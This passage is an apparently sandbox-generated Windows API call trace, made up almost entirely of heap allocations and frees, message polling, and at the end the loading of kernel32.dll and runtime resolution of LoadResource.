hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0119.719] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff118 | out: hHeap=0x12c0000) returned 1 [0119.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0119.720] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0119.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0119.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0119.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0119.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0119.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0119.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7f0 | out: hHeap=0x12c0000) returned 1 [0119.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0119.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0119.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.720] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0119.720] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2d0 [0119.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0119.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0119.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2d0 | out: hHeap=0x12c0000) returned 1 [0119.721] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0119.721] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.721] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff320 [0119.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0119.721] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0119.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0119.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1b8 [0119.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0119.722] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0119.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff320 | out: hHeap=0x12c0000) returned 1 [0119.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1b8 | out: hHeap=0x12c0000) returned 1 [0119.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0119.722] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.723] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458fd8 | out: hHeap=0x12c0000) returned 1 [0119.723] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0119.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0119.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0119.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491838 | out: hHeap=0x12c0000) returned 1 [0119.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0119.723] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0119.723] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0119.723] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.728] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0119.728] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.728] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff438 [0119.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0119.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0119.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0119.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0119.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0119.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.729] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0119.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0119.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0119.729] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0119.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd490 [0119.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0119.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0119.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff438 | out: hHeap=0x12c0000) returned 1 [0119.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0119.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd490 | out: hHeap=0x12c0000) returned 1 [0119.730] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.730] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0119.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0119.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0119.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0119.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c98 [0119.730] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c98 | out: hHeap=0x12c0000) returned 1 [0119.730] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.730] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0119.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0119.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491978 [0119.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491978 | out: hHeap=0x12c0000) returned 1 [0119.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0119.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0119.731] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0119.731] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0119.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0119.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e98 [0119.732] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e98 | out: hHeap=0x12c0000) returned 1 [0119.732] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef790 [0119.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0119.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0119.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0119.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0119.732] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0119.732] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0119.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7c0 [0119.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0119.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f98 [0119.732] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f98 | out: hHeap=0x12c0000) returned 1 [0119.732] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0119.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0119.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ad8 [0119.733] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0119.733] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0119.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0119.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0119.733] PeekMessageW (in: lpMsg=0x7df77c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df77c) returned 0 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff000 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.733] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0119.733] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef750 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.734] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd490 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0119.734] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0119.734] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.734] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.734] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0119.735] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef760 [0119.735] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0119.735] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9b8 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7c0 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0119.735] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9b8 | out: hHeap=0x12c0000) returned 1 [0119.735] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.735] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0119.735] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff140 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd868 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0119.735] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd820 [0119.735] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0119.735] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0119.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0119.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0119.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6e8 [0119.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0119.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0119.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6d0 [0119.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6e8 | out: hHeap=0x12c0000) returned 1 [0119.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0119.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0119.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.736] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0119.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd910 [0119.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0119.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LoadResource", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.736] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd) returned 0x14bd9a0 [0119.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LoadResource", cchWideChar=13, lpMultiByteStr=0x14bd9a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoadResource", lpUsedDefaultChar=0x0) returned 13 [0119.736] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0119.737] GetProcAddress (hModule=0x74650000, lpProcName="LoadResource") returned 0x746676f0 [0119.737] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0119.737] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.737] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2f8 [0119.737] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0119.737] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0119.737] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0119.737] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 